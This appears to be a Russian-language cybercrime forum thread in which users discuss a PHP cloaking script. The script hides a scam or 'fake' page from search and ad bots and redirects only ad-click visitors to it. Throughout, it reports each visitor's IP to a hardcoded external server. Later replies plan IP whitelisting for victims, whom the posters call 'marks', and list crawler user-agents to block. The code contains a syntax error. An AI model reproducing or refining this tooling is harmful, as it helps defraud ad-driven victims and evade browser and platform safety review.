• XSS.stack #1 – первый литературный журнал от юзеров форума

Помогите разобраться со скриптом

Отслеживать

black_labo

RAID-массив
Пользователь
Регистрация
05.04.2020
Сообщения
56
Реакции
6
Помогите пожалуйста разобраться со скриптом. Данный скрип делает редикет на домен при переходе с рекламы! Хочу им защитить сайт от покраснения! Тоесть пока что не будет клика по рекламе фейк не откроется даже ботам!И как можно закрыть посещения на сайт всем пользователям кроме тех кто перешли по рекламе!

PHP: 
<?php
function cl() {
$s = $_SERVER;
if( !preg_match("/text\/html/", $s['HTTP_ACCEPT']) ) {
//echo "1";
return false;
  }
if( !preg_match("/^(ru|ru-RU)/", $ ['HTTP_ACCEPT_LANGUAGE']) ) {
//echo $s['HTTP_ACCEPT_LANGUAGE'];
  //return false;
   }
if( $s['HTTP_CF_IPCOUNTRY'] != 'RU' ) {
//echo "3";
  //return false;
  }
  if( !preg_match("/https\:\/\/www\.google\.(com|ru)\//", $s['HTTP_REFERER']) ) {
   //echo "4";
   //return false;
  }
  if( (!isset($s['HTTP_REFERER']) OR $s['HTTP_REFERER'] == "") AND isset($_GET['yclid']) AND $_GET['yclid']!=""){
//return true;
}
   if( !preg_match("/((http(s|)\:\/\/www\.google\.(ru|com|it|fr|gr))|(http(s|)\:\/\/(yabs|bs)\.yandex\.(ru|com)\/)|(http(s|)\:\/\/go\.mail\.ru\/))/", $s['HTTP_REFERER']) ) {
   //echo "4";
return false;
}
  return true;
}
if (!function_exists('_is_curl_install()'))
{
function _is_curl_install()
  {
    if (in_array('curl', get_loaded_extensions()))
   {
  return true;
   }
  else
{
return false;
  }
}
}
if (_is_curl_install())
{
}
else
{
  echo 'Install CURL on server';
    die;
}
@$_SERVER['HTTP_ACCEPT_LANGUAGE'] = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if (!function_exists('getRealIpAddrAF'))
{
function getRealIpAddrAF()
  {
   if ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR']) <> '127.0.0.1'))
  {
$ip = $_SERVER['GEOIP_ADDR'];
}
   elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR']) <> '127.0.0.1') && (($_SERVER['HTTP_X_FORWARDED_FOR']) <> ($_SERVER['SERVER_ADDR'])))
  {
$ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']) [0];      }
   elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP']) <> '127.0.0.1') && (($_SERVER['HTTP_CLIENT_IP']) <> ($_SERVER['SERVER_ADDR'])))
     {
$ip = $_SERVER['HTTP_CLIENT_IP'];
    }
   elseif ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP']) <> '127.0.0.1') && (($_SERVER['HTTP_CF_CONNECTING_IP']) <> ($_SERVER['SERVER_ADDR']))
{   $ip= $_SERVER['HTTP_CF_CONNECTING_IP'];      }
else
   {
   $ip = $_SERVER['REMOTE_ADDR'];
   }
  return $ip;
   }
}
$ip = getRealIpAddrAF();
if ( cl() )
{   echo "<div id='Ba'></div>";
    $ch = curl_init("http://188.209.52.48:33914/ip.php?p=jtX8ehWNxudV2psmRjYBqSr&ip=".$ip);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_exec($ch);
$urlnew="https://www.siti.com/"; // URLкуда делать редирект
echo "<html><head><meta http-equiv='refresh' content='0; url=".$urlnew."'></meta></head><script>top.window.location = '".$urlnew."';</script></html>";
  die();
}
else
{
  $ch = curl_init("http://188.209.52.48:33914/ip.php?p=jtX8ehWNxudV2psmRjYBqSr&ip=".$ip);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  echo curl_exec($ch);
  print_r(curl_error($ch));
  curl_close($ch);
echo "<div id='Fa'>$ip</div>";
}
?>
 
Последнее редактирование модератором:
Оформи код нормально. Имей уважение к тем, кто его, возможно, будет править.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Pernat1y сказал(а):
Оформи код нормально. Имей уважение к тем, кто его, возможно, будет править.
Скрытый контент для пользователей: Pernat1y.
 
solovey сказал(а):
ботам глубоко паралельны твои скрипты, они не через банеры сайт находят, настраивай запреты через

.htaccess​

Не подскажешь как это сделать?
 
EL KURITO сказал(а):
у тебя скрипты половину через фильтры идут
Ну то что там есть фильтр по пустому рефу я знаю. Ну там ещё я так понял закрыт фейк со всех ip. А когда ставишь этот скрипт на вайтпедж то он передаёт ip мамонта который перешёл с Рекламы на фейк и фейк открывается только с Рекламы! А прямые переходы запрещены. Вот у меня не хватает другой части скрипта( если кто понял о чем я говорю и знает как это сделать, Велком в пм контакт) Спасибо
 
black_labo сказал(а):
Не дружище это не то(
Вижу такой вариант.
Запретить доступ ботам.
Далее при клике установить cookie и проверять уже на нужном сайте если их нет то выкидывать обратно на рекламу.
Как это сделать я хз я не кодер.
 
Все легче делается нужно написать скрипт чтобы когда заходили на вайтпеж скрипт записывал ip и отправлял на фейк в белый лист ip и фейк разрешал заход! Вот собственно как то так вижу эту схему.
 

Google​

Официальная страница с описанием: Поисковые роботы Google

Опубликованные​

  • Googlebot
  • Googlebot-News
  • Googlebot-Image
  • Googlebot-Video
  • Mediapartners-Google или Mediapartners
  • AdsBot-Google
  • AdsBot-Google-Mobile-Apps

Не опубликованные​

  • GoogleImageProxy
    Используется для кэширования изображений с сайта. Сканирует только изображения.
  • Google Web Preview
    Пока точно не известно какую роль выполняет данный робот.
  • googleweblight
    При просмотре сайта с медленных источников Интернета Google предлагает посмотреть упрощенную версию веб-страниц. Эта "приписка" как раз свидетельствует, что использовался подобный просмотр. Для примера можно использовать сервис http://googleweblight.com/?lite_url=URL_сайта.
  • Google Page Speed Insights
    Посещение при анализе сайта с помощью сервиса "PageSpeed Insights" - https://developers.google.com/speed/pagespeed/insights/?hl=ru
  • Google-Structured-Data-Testing-Tool
    (посещение при анализе сайта с помощью сервиса "Проверка структурированных данных" - https://search.google.com/structured-data/testing-tool?hl=ru)
  • Google Favicon
    (Всегда делает запросы по методу GET. Пока точно не известно какую роль выполняет данный робот. Инициализируется запрос на сайт с подобной записью, если запросить URL https://www.google.com/s2/favicons?domain=site.ru)
  • Google-Adwords-Instant
    (при использовании в Adwords типа быстрого просмотрщика объявлений. Необходимо проверить теорию!)
  • Google_Analytics_Snippet_Validator
    (это посещение остается загадкой, сам лично я не нашел связей, в Интернете тоже "тишина")
  • Google-Site-Verification
    (используется при проверке прав на владение сайтом, судя по всему нужно только для добавления сайта в Вэбмастер. Загружает страницы проверки и главную страницу)
  • Google PP Default
    (это посещение остается загадкой, сам лично я не нашел связей, в Интернете тоже "тишина")
  • Google-SearchByImage
    (Инициализируется посещение при выполнении поиска картинки через "Google Картинки")
  • Google Search Console
    (пока неизвестно, выяснить!)

Яндекс​

Официальная страница с описанием: Роботы Яндекса в логах сервера.

  • YandexBot
  • YandexAccessibilityBot
  • YandexMobileBot
  • YandexDirectDyn
  • YandexScreenshotBot
  • YandexImages
  • YandexVideo
  • YandexVideoParser
  • YandexMedia
  • YandexBlogs
  • YandexFavicons
  • YandexWebmaster
  • YandexPagechecker
  • YandexImageResizer
  • YandexAdNet
  • YandexDirect
  • YaDirectFetcher
  • YandexCalendar
  • YandexSitelinks
  • YandexMetrika
  • YandexNews
  • YandexNewslinks
  • YandexCatalog
  • YandexAntivirus
  • YandexMarket
  • YandexVertis
  • YandexForDomain
  • YandexSpravBot
  • YandexSearchShop
  • YandexMedianaBot
  • YandexOntoDB
  • YandexOntoDBAPI

Mail.ru​

Официальная страница с описанием: Как отображается робот в логах сервера

  • Mail.RU_Bot
  • Mail.RU_Bot/Fast
  • Mail.RU_Bot/Img
  • Mail.RU_Bot/Robots

Bing​

Официальная страница с описанием: Основные поисковые роботы Bing. Эта поисковая система предоставляет сервис «Проверить Bingbot», с помощью которого можно узнать принадлежит ли IP адрес бота поисковой системе Bing.

  • Bingbot
  • MSNBot
  • MSNBot-Media
  • AdIdxBot
  • BingPreview

Yahoo​

  • Yahoo! Slurp

Petal Search​

 
black_labo сказал(а):
Все легче делается нужно написать скрипт чтобы когда заходили на вайтпеж скрипт записывал ip и отправлял на фейк в белый лист ip и фейк разрешал заход! Вот собственно как то так вижу эту схему.
Кто может сделать этот функционал отпишитесь пожалуйста в лс
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Смени там пару названий в файлах, .php и внутри их смени пару и добавь значений к переменным и все еще было бы не плохо .htaccess добавить URL https://localhost.ns NS URL http://127.0.0.1:80 URL LINK HTTP://127.0.0.12 EXIT URL <<<| | | ======== Точно не помню.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх